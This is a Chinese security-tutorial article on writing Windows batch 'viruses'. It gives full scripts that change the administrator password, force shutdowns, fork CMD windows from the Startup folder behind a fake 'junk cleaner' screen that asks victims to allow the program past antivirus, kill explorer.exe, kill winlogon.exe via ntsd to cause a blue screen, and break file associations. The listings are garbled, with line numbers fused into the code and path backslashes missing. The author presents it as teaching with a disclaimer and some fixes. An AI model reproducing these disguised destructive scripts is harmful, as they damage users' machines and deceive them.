【編者按】病毒這個(gè)不速之客讓人談之色變，它像一個(gè)藏在斗篷俠下的黑衣人，被“光顧”的人就會(huì)倒霉。本文為作者的網(wǎng)絡(luò)安全自學(xué)教程系列文章之一，將講解簡單的病毒原理知識，并通過批處理代碼制作病毒，包括自動(dòng)啟、修改密碼、定時(shí)關(guān)機(jī)、藍(lán)屏、進(jìn)程關(guān)閉等功能。希望這篇基礎(chǔ)文章對大家有所幫助，更希望大家提高安全意識，學(xué)會(huì)相關(guān)防范，也歡迎大家討論。

 

 

作者 | 楊秀璋

責(zé)編 | 夕顏

本文授權(quán)轉(zhuǎn)載自CSDN博客專家Eastmount

聲明：本人堅(jiān)決反對利用教學(xué)方法進(jìn)行犯罪的行為，一切犯罪行為必將受到嚴(yán)懲，綠色網(wǎng)絡(luò)需要我們共同維護(hù)，更推薦大家了解它們背后的原理，更好地進(jìn)行防護(hù)。

 

 

一.關(guān)機(jī)bat腳本

計(jì)算機(jī)病毒(Computer Virus)是編制者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者數(shù)據(jù)的代碼，能影響計(jì)算機(jī)使用，能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼。計(jì)算機(jī)病毒具有傳播性、隱蔽性、感染性、潛伏性、可激發(fā)性、表現(xiàn)性或破壞性。

計(jì)算機(jī)病毒的生命周期：開發(fā)期→傳染期→潛伏期→發(fā)作期→發(fā)現(xiàn)期→消化期→消亡期。計(jì)算機(jī)病毒是一個(gè)程序，一段可執(zhí)行碼。就像生物病毒一樣，具有自我繁殖、互相傳染以及激活再生等生物病毒特征。計(jì)算機(jī)病毒有獨(dú)特的復(fù)制能力，它們能夠快速蔓延，又常常難以根除。它們能把自身附著在各種類型的文件上，當(dāng)文件被復(fù)制或從一個(gè)用戶傳送到另一個(gè)用戶時(shí)，它們就隨同文件一起蔓延開來。

下面講解第一個(gè)批處理腳本，主要是調(diào)用“shutdown”實(shí)現(xiàn)關(guān)機(jī)。其基本步驟如下：

新建文本文檔

輸入 shutdown -s -t 600

把txt改成bat

如下圖所示，運(yùn)行CMD可以查看shutdown命令的基本用法。

 

 

基本命令為：

1 shutdown -s -t 6002//現(xiàn)在讓系統(tǒng)600秒之后關(guān)機(jī)34shutdown -a5//終止關(guān)閉計(jì)算機(jī)

運(yùn)行結(jié)果如下圖所示：

 

 

新建“test.bat”并填寫“ shutdown -s -t 600”，某些系統(tǒng)需要在“文件夾選項(xiàng)”中，顯示“隱藏已知文件類型的擴(kuò)展名”。

 

 

雙擊BAT文件即運(yùn)行關(guān)機(jī)，如果需要取消，還是在CMD黑框中輸入“shutdown -a”命令。

 

 

二.修改密碼和定時(shí)關(guān)機(jī)病毒

接下來分享一個(gè)比較完整的病毒制作過程。

第一步，新建game.bat文件。

 

 

程序編寫如下所示，其中“@echo off”表示關(guān)閉回顯，“color 0a”表示設(shè)置顏色。

1 @echo off2color 0a3title Eastmount程序45echo ===================================6echo 菜單7echo 1.修改管理員密碼8echo 2.定時(shí)關(guān)機(jī)9echo 3.退出本程序10echo ===================================1112pause

運(yùn)行結(jié)果如下圖所示，可以看到標(biāo)題為“Eastmount程序”，并且包含相關(guān)內(nèi)容，這就是批處理文件執(zhí)行過程。

 

 

第二步，做一個(gè)選擇判斷，該程序需要和用戶進(jìn)行互動(dòng)。

核心代碼為“set /p num=您的選擇是：”，其表示設(shè)置變量num，“/p”表示暫停并等待用戶輸入，用戶最終輸入的值賦為num。

1 @echo off2color 0a3title Eastmount程序45echo ===================================6echo 菜單7echo 1.修改管理員密碼8echo 2.定時(shí)關(guān)機(jī)9echo 3.退出本程序10echo ===================================1112set /p num=您的選擇是：1314pause

輸出結(jié)果如下圖所示：

 

 

第三步，補(bǔ)充修改管理員密碼、定時(shí)關(guān)機(jī)、退出等命令。

修改管理員密碼的命令是微軟所有系統(tǒng)的通用命令，下述代碼是修改當(dāng)前管理員密碼為“123456”。

1 net user administrator 123456

 

 

第二個(gè)選項(xiàng)是關(guān)機(jī)，命令如下：

1 shutdown -s -t 100

第三個(gè)選項(xiàng)是退出本程序。

1 exit

接著編寫判斷和跳轉(zhuǎn)批處理代碼，代碼如下所示，“>nul”表示不輸出運(yùn)行提示信息。

1 @echo off2color 0a3title Eastmount程序45:menu6echo ===================================7echo 菜單8echo 1.修改管理員密碼9echo 2.定時(shí)關(guān)機(jī)10echo 3.退出本程序11echo ===================================1213set /p num=您的選擇是：14if "%num%"=="1" goto 115if "%num%"=="2" goto 216if "%num%"=="3" goto 31718:119net user administrator 123456 > nul20echo 您的密碼已經(jīng)設(shè)置成功!21pause22goto menu2324:225shutdown -s -t 10026goto menu2728:329exit

此時(shí)輸入“1”會(huì)提示系統(tǒng)錯(cuò)誤，如下圖所示：

 

 

同時(shí)，殺毒軟件也會(huì)提示黑客修改電腦，點(diǎn)擊“允許操作”即可，

 

 

接著增加“cls”命令清屏。同時(shí)，為了避免輸入數(shù)字“4”會(huì)從頭執(zhí)行到尾，補(bǔ)充一個(gè)提示信息。代碼修改如下：

1 @echo off2color 0a3title Eastmount程序45:menu6cls7echo ===================================8echo 菜單9echo 1.修改管理員密碼10echo 2.定時(shí)關(guān)機(jī)11echo 3.退出本程序12echo ===================================1314set /p num=您的選擇是：15if "%num%"=="1" goto 116if "%num%"=="2" goto 217if "%num%"=="3" goto 31819echo 您好!請輸入1-3正確的數(shù)字20pause21goto menu2223:124net user administrator 123456 >nul25echo 您的密碼已經(jīng)設(shè)置成功!26pause27goto menu2829:230shutdown -s -t 10031goto menu3233:334exit

此時(shí)運(yùn)行如下圖所示：

 

 

繼續(xù)修改代碼，補(bǔ)充設(shè)置的用戶名和新密碼，關(guān)機(jī)時(shí)間等。

1 @echo off2color 0a3title Eastmount程序45:menu6cls7echo ===================================8echo 菜單9echo 1.修改管理員密碼10echo 2.定時(shí)關(guān)機(jī)11echo 3.退出本程序12echo ===================================1314set /p num=您的選擇是：15if "%num%"=="1" goto 116if "%num%"=="2" goto 217if "%num%"=="3" goto 31819echo 您好!請輸入1-3正確的數(shù)字20pause21goto menu2223:124set /p u=請輸入用戶名:25set /p p=請輸入新密碼:26net user %u% %p% >nul27echo 您的密碼已經(jīng)設(shè)置成功!28pause29goto menu3031:232set /p time=請輸入時(shí)間:33shutdown -s -t %time%34goto menu3536:337exit

以“管理員身份運(yùn)行”后，成功修改“xiuzhang”用戶的開機(jī)密碼。

 

 

輸入2可以設(shè)置關(guān)機(jī)時(shí)間，這里就不再贅述，第一部分已經(jīng)詳細(xì)講解。

 

 

三.自啟動(dòng)死機(jī)病毒

接著編寫一個(gè)偽裝成“系統(tǒng)垃圾清理”的代碼，它其實(shí)是一個(gè)導(dǎo)致系統(tǒng)死機(jī)的代碼，也不能算是“病毒”，更多是一個(gè)惡作劇程序。其原理是不斷打開CMD程序，占用系統(tǒng)資源從而導(dǎo)致死機(jī)，并且每次開機(jī)都會(huì)自動(dòng)啟。

PS：這里強(qiáng)調(diào)一句，建議大家在虛擬機(jī)中運(yùn)行該代碼。我們作為安全工程師，希望您們?nèi)チ私饴┒幢澈蟮脑?，更好地進(jìn)行防御，綠色網(wǎng)絡(luò)需要我們共同維護(hù)，杜絕一切違法行為。

第一步，在C:windows目錄下創(chuàng)建文件“windows.bat”。一個(gè)“>”表示覆蓋文件內(nèi)容，兩個(gè)“>>”表示追加一句話至文件末尾。

1echo start cmd >c:windowswindows.bat2echo %0>>c:windowswindows.bat

用戶打開這個(gè)程序之后，程序就會(huì)不斷打開cmd，占用系統(tǒng)資源，導(dǎo)致系統(tǒng)癱瘓，%0是再次執(zhí)行該程序的意思。但是，這樣只能讓用戶死機(jī)一次，重啟系統(tǒng)以后，不再打開這個(gè)文件以后，就不再會(huì)中招了。

第二步，將這個(gè)惡意腳本放到開機(jī)菜單中，每次開機(jī)都自動(dòng)啟動(dòng)運(yùn)行并導(dǎo)致電腦死機(jī)。

errorlevel為預(yù)定義變量，隨著系統(tǒng)變化而變化。如果為0表示上一條命令執(zhí)行成功，如果非0表示上一條命令執(zhí)行失敗，它不是Win7系統(tǒng)，而執(zhí)行下面這條命令(XP系統(tǒng)、2003系統(tǒng))。

 

 

代碼“echo.”表示空行，比如代碼：

 

 

輸出結(jié)果如下圖所示：

 

 

第三步，接著編寫next區(qū)域代碼，完整代碼如下所示。

1@echo off2title 系統(tǒng)垃圾清理3color 2f4echo =====若有殺毒軟件惡意攔截，請選擇【允許程序的所有操作】====5echo.6echo.78echo start cmd >c:windowswindows.bat9::echo %%0>>c:windowswindows.bat1011copy c:windowswindows.bat "%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup">nul12if %errorlevel%==0 goto next1314copy c:windowswindows.bat "%USERPROFILE%「開始」菜單程序啟動(dòng)">nul15if %errorlevel%==1 goto error1617:next18echo.19echo.20echo =====垃圾清理中，請不要關(guān)閉窗口=========21echo.22ping -n 5 127.0.0.1>nul23echo.24echo =====垃圾清理完畢,共清理垃圾500M=======25echo.26echo.27echo =====建議立即重啟電腦==========28pause2930:error31echo.32echo.33echo ======程序運(yùn)行失敗，請【使用管理員權(quán)限】重新運(yùn)行!========34echo.35pause

注意，我注釋了重復(fù)操作代碼“::echo %%0>>c:windowswindows.bat”，否則開機(jī)自啟動(dòng)很麻煩。接著運(yùn)行代碼，如下圖所示，需要右鍵“以管理員身份運(yùn)行”。

 

 

代碼會(huì)在C:windwos目錄下創(chuàng)建批處理文件“windows.bat”。

 

 

同時(shí)，在我的Win10系統(tǒng)開機(jī)自動(dòng)動(dòng)目錄下也有該文件。

目錄：…AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

 

 

打開該文件可以看到寫入的“start cmd”代碼，表示打開CMD。

 

 

雙擊該“windows.bat”文件，運(yùn)行結(jié)果如下圖所示。

 

 

總結(jié)：本文編寫了一個(gè)系統(tǒng)清理工具，其實(shí)是把這個(gè)windows.bat寫到用戶的開機(jī)自啟動(dòng)目錄下，達(dá)到用戶每次開機(jī)，都會(huì)運(yùn)行該程序的目的，重復(fù)調(diào)用CMD占用資源。如果中了該病毒，用戶可以使用PE到開啟啟動(dòng)目錄把windows.bat文件刪除，或者重裝系統(tǒng)，再次建議大家別讓它重復(fù)運(yùn)行。

 

 

四.進(jìn)程關(guān)閉病毒

再看一個(gè)偽裝垃圾清理的批處理代碼。該命令是殺死進(jìn)程，“/im explorer.exe”表示要?dú)⑺赖倪M(jìn)程名稱，關(guān)閉桌面;“/f”表示強(qiáng)制殺死;“>nul”表示在屏幕上不要輸出任何信息。

1taskkill /im explorer.exe /f >nul 2>nul

完整代碼如下所示，其中“Start c:windowsexpolrer.exe”表示繼續(xù)開啟桌面，“ping -n 5 127.0.0.1>nul”用于消耗時(shí)間。

1@echo off2title 系統(tǒng)垃圾清理3color 2f4echo =====若有殺毒軟件惡意攔截，請選擇【允許程序的所有操作】====5echo.6echo.7echo.8echo =====垃圾清理中，請不要關(guān)閉窗口=========9echo.10ping -n 5 127.0.0.1>nul11taskkill /im explorer.exe /f >nul 2>nul12echo.13echo =====拐了，你的系統(tǒng)已經(jīng)廢了=======14echo.15ping -n 5 127.0.0.1>nul16echo.17Start c:windowsexplorer.exe18echo.19echo =====已經(jīng)修復(fù)好!是不是嚇壞了!!O(∩_∩)O==========20pause

運(yùn)行該批處理程序，桌面會(huì)消失，如下圖所示。

 

 

過一會(huì)桌面又會(huì)恢復(fù)。由于作者桌面東西太亂，這里僅顯示壁紙展示。

 

 

五.最簡單的藍(lán)屏炸彈文件

新建文本文檔

輸入：ntsd -c q -pn winlogon.exe，表示強(qiáng)制殺死進(jìn)程

工具->文件夾選項(xiàng)->查看->“隱藏已知文件類型的擴(kuò)展名”勾選

txt修改為bat

開始->程序->啟動(dòng)，打開game.bat文件

黑客很少攻擊個(gè)人，一般攻擊服務(wù)器，該命令對2003的服務(wù)器特別有殺傷力

 

 

雙擊之后，服務(wù)器直接藍(lán)屏顯示并重啟。

 

 

ntsd從Windows 2000開始就是系統(tǒng)自帶的進(jìn)程調(diào)試工具，在system32目錄下。ntsd的功能非常的強(qiáng)大，用法也比較復(fù)雜，但如果只用來結(jié)束一些進(jìn)程，那就比較簡單了。在Windows中只有System、SMSS.EXE和CSRSS.EXE不能殺。前兩個(gè)是純內(nèi)核態(tài)的，最后那個(gè)是Win32子系統(tǒng)，ntsd本身需要它。lsass.exe也不要?dú)⒌?，它是?fù)責(zé)本地賬戶安全的。被調(diào)試器附著的進(jìn)程會(huì)隨調(diào)試器一起退出，所以可以用來在命令行下終止進(jìn)程。

打開cmd 后輸入以下命令就可以結(jié)束進(jìn)程：

方法一：利用進(jìn)程的PID結(jié)束進(jìn)程

命令格式：ntsd -c q -p pid

命令范例：ntsd -c q -p 1332 (結(jié)束explorer.exe進(jìn)程)

范例詳解：explorer.exe的pid為1332，但是如何獲取進(jìn)程的pid呢?在CMD下輸入TASKLIST就可以獲取當(dāng)前任務(wù)管理器所有進(jìn)程的PID?；蛘叽蜷_任務(wù)管理器，在菜單欄，選擇“查看”->“選擇列”，在打開的選擇項(xiàng)窗口中將“PID(進(jìn)程標(biāo)識符)”項(xiàng)選擇鉤上，這樣任務(wù)管理器的進(jìn)程中就會(huì)多出PID一項(xiàng)了。PID的分配并不固定，是在進(jìn)程啟動(dòng)是由系統(tǒng)隨機(jī)分配的，所以進(jìn)程每次啟動(dòng)的進(jìn)程一般都不會(huì)一樣。

方法二：利用進(jìn)程名結(jié)束進(jìn)程

命令格式：ntsd -c q -pn xxxx.exe (xxxx.exe 為進(jìn)程名，exe不能省)

命令范例：ntsd -c q -pn explorer.exe

另外的能結(jié)束進(jìn)程的DOS命令還有taskkill和tskill命令。

 

 

六.最簡單的擴(kuò)展名病毒

將文件格式修改或文檔加密都是常見的病毒，比如永恒之藍(lán)、勒索病毒等，它們就是將電腦內(nèi)的所有資料、文檔加密，當(dāng)你要打開文件時(shí)，需要密碼，此時(shí)通過比特幣付費(fèi)進(jìn)行勒索。

下面這個(gè)小操作是將exe文件修改為txt文檔。當(dāng)遇到可執(zhí)行的exe文件，會(huì)認(rèn)為它是一個(gè)txt文檔，用記事本打開，導(dǎo)致可執(zhí)行程序運(yùn)行不起來，這是就是這個(gè)病毒的原理。

新建文本文檔

增加代碼：assoc.exe=txtfile

工具->文件夾選項(xiàng)->查看->“隱藏已知文件類型的擴(kuò)展名”勾選

txt修改為bat

開始->程序->啟動(dòng)，打開bat文件

雙擊運(yùn)行bat文件之后，我們的可執(zhí)行文件就變成了txt文件。此時(shí)系統(tǒng)認(rèn)為exe就是txt程序，把系統(tǒng)的關(guān)聯(lián)搞混亂了，它恢復(fù)起來很麻煩。

 

 

EXE程序打開如下圖所示。

 

 

甚至打開CMD都是TXT文本文件。

 

 

接著需要執(zhí)行下面的命令還原exe文件。

assoc.exe=exefile

還原的代碼及效果如下圖所示。

 

 

其他所有文件格式都轉(zhuǎn)換為txt文件，如下所示。此時(shí)，如果隱藏文件擴(kuò)展名，甚至可以修改圖標(biāo)偽裝成目標(biāo)應(yīng)用，當(dāng)用戶點(diǎn)擊時(shí)會(huì)執(zhí)行這些破壞;但由于不知道目標(biāo)是否有隱藏文件擴(kuò)展名，還是不建議這種“笨”方法。

1assoc .htm=txtfile2assoc .dat=txtfile3assoc .com=txtfile4assoc .rar=txtfile5assoc .gho=txtfile6assoc .mvb=txtfile7...

解決方法：

如果您不幸中了該病毒，怎么解決呢?如下圖所示，還原所有正確關(guān)聯(lián)即可。

 

 

PS：還有一些病毒，比如VBS腳本、網(wǎng)頁彈窗(網(wǎng)站釣魚)等，這里不再講解，推薦讀者閱讀前文“[網(wǎng)絡(luò)安全自學(xué)篇] 二十五.Web安全學(xué)習(xí)路線及木馬、病毒和防御初探”。如果把病毒程序放到啟動(dòng)項(xiàng)，每次開機(jī)都會(huì)自動(dòng)執(zhí)行。

 

 

七.總結(jié)

希望這系列文章對您有所幫助，真的感覺自己技術(shù)好菜，要學(xué)的知識好多。這是第44篇原創(chuàng)的安全系列文章，從網(wǎng)絡(luò)安全到系統(tǒng)安全，從木馬病毒到后門劫持，從惡意代碼到溯源分析，從滲透工具到二進(jìn)制工具，還有Python安全、頂會(huì)論文、黑客比賽和漏洞分享。未知攻焉知防，人生漫漫其路遠(yuǎn)兮，作為初學(xué)者，自己真是爬著前行，感謝很多人的幫助，繼續(xù)爬著，繼續(xù)加油!